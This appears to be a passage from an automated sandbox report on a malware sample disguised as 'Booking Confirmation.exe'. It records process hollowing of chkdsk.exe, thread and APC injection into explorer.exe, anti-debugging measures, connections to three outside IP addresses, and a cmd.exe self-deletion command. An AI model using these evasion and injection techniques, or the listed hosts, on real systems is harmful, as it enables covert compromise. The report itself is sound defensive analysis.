Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D290AF mov eax, dword ptr fs:[00000030h]		8_2_04D290AF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]		8_2_04D00050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]		8_2_04D00050
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA2073 mov eax, dword ptr fs:[00000030h]		8_2_04DA2073
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1074 mov eax, dword ptr fs:[00000030h]		8_2_04DB1074
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]		8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]		8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]		8_2_04D67016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]		8_2_04DB4015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]		8_2_04DB4015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]		8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]		8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]		8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]		8_2_04CFB02A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]		8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]		8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]		8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]		8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]		8_2_04D1002D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]		8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]		8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]		8_2_04CEB1E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D741E8 mov eax, dword ptr fs:[00000030h]		8_2_04D741E8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12990 mov eax, dword ptr fs:[00000030h]		8_2_04D12990
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C182 mov eax, dword ptr fs:[00000030h]		8_2_04D0C182
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A185 mov eax, dword ptr fs:[00000030h]		8_2_04D1A185
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]		8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]		8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]		8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]		8_2_04D651BE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D669A6 mov eax, dword ptr fs:[00000030h]		8_2_04D669A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]		8_2_04D161A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]		8_2_04D161A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]		8_2_04D0B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]		8_2_04D0B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC962 mov eax, dword ptr fs:[00000030h]		8_2_04CEC962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]		8_2_04CEB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]		8_2_04CEB171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]		8_2_04CE9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]		8_2_04CE9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]		8_2_04CE9100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]		8_2_04D1513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]		8_2_04D1513A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120 mov ecx, dword ptr fs:[00000030h]		8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12ACB mov eax, dword ptr fs:[00000030h]		8_2_04D12ACB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12AE4 mov eax, dword ptr fs:[00000030h]		8_2_04D12AE4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]		8_2_04D1D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]		8_2_04D1D294
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FAB0 mov eax, dword ptr fs:[00000030h]		8_2_04D1FAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]		8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]		8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]		8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]		8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]		8_2_04CE52A5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]		8_2_04CFAAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]		8_2_04CFAAB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D74257 mov eax, dword ptr fs:[00000030h]		8_2_04D74257
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]		8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]		8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]		8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]		8_2_04CE9240
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAEA55 mov eax, dword ptr fs:[00000030h]		8_2_04DAEA55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2927A mov eax, dword ptr fs:[00000030h]		8_2_04D2927A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]		8_2_04D9B260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]		8_2_04D9B260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8A62 mov eax, dword ptr fs:[00000030h]		8_2_04DB8A62
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF8A0A mov eax, dword ptr fs:[00000030h]		8_2_04CF8A0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D03A1C mov eax, dword ptr fs:[00000030h]		8_2_04D03A1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]		8_2_04DAAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]		8_2_04DAAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]		8_2_04CEAA16
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]		8_2_04CEAA16

Enables debug privileges

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 156.227.187.201 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.175.200.247 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.169.149.11 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2E0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.675063336.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.923187943.0000000005E50000.00000004.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Users\user\Desktop\Booking Confirmation.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
